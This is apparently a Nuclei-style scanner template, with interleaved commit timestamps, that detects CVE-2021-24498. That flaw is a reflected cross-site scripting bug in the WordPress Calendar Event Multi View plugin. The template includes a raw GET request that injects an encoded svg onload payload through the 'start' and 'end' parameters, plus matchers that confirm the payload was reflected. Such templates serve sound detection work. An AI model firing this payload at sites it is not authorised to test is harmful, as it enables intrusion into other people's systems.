2021-07-19 05:10:50 +00:00
id : CVE-2021-24498
info :
2022-08-29 13:55:23 +00:00
name : WordPress Calendar Event Multi View <1.4.01 - Cross-Site Scripting
2021-07-19 05:10:50 +00:00
author : suman_kar
severity : medium
2022-08-29 13:55:23 +00:00
description : WordPress Calendar Event Multi View plugin before 1.4.01 contains an unauthenticated reflected cross-site scripting vulnerability. It does not sanitize or escape the 'start' and 'end' GET parameters before outputting them in the page (via php/edit.php).
2022-04-22 10:38:41 +00:00
reference :
- https://wpscan.com/vulnerability/3c5a5187-42b3-4f88-9b0e-4fdfa1c39e86
2022-08-29 13:55:23 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-24498
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 6.1
2021-09-10 11:26:40 +00:00
cve-id : CVE-2021-24498
cwe-id : CWE-79
2023-04-12 10:55:48 +00:00
epss-score : 0.00188
2023-07-11 19:49:27 +00:00
cpe : cpe:2.3:a:dwbooster:calendar_event_multi_view:*:*:*:*:*:wordpress:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
framework : wordpress
vendor : dwbooster
product : calendar_event_multi_view
tags : cve,cve2021,xss,wordpress,wp-plugin,wpscan
2021-07-19 05:10:50 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-07-19 05:10:50 +00:00
- raw :
- |
GET /?cpmvc_id=1&cpmvc_do_action=mvparse&f=edit&month_index=0&delete=1&palette=0&paletteDefault=F00&calid=1&id=999&start=a%22%3E%3Csvg/%3E%3C%22&end=a%22%3E%3Csvg/onload=alert(1)%3E%3C%22 HTTP/1.1
Host : {{Hostname}}
Accept-Encoding : gzip, deflate
Accept-Language : en-GB,en-US;q=0.9,en;q=0.8
Connection : close
2021-07-19 11:23:47 +00:00
2021-07-19 05:10:50 +00:00
matchers-condition : and
matchers :
- type : word
2023-07-11 19:49:27 +00:00
part : body
2021-07-19 05:10:50 +00:00
words :
- '><svg/onload=alert(1)><'
- 'Calendar Details'
condition : and
2021-07-19 11:23:47 +00:00
- type : word
2023-07-11 19:49:27 +00:00
part : header
2021-07-19 11:23:47 +00:00
words :
- 'text/html'
2021-07-19 05:10:50 +00:00
- type : status
status :
2021-07-19 05:15:58 +00:00
- 200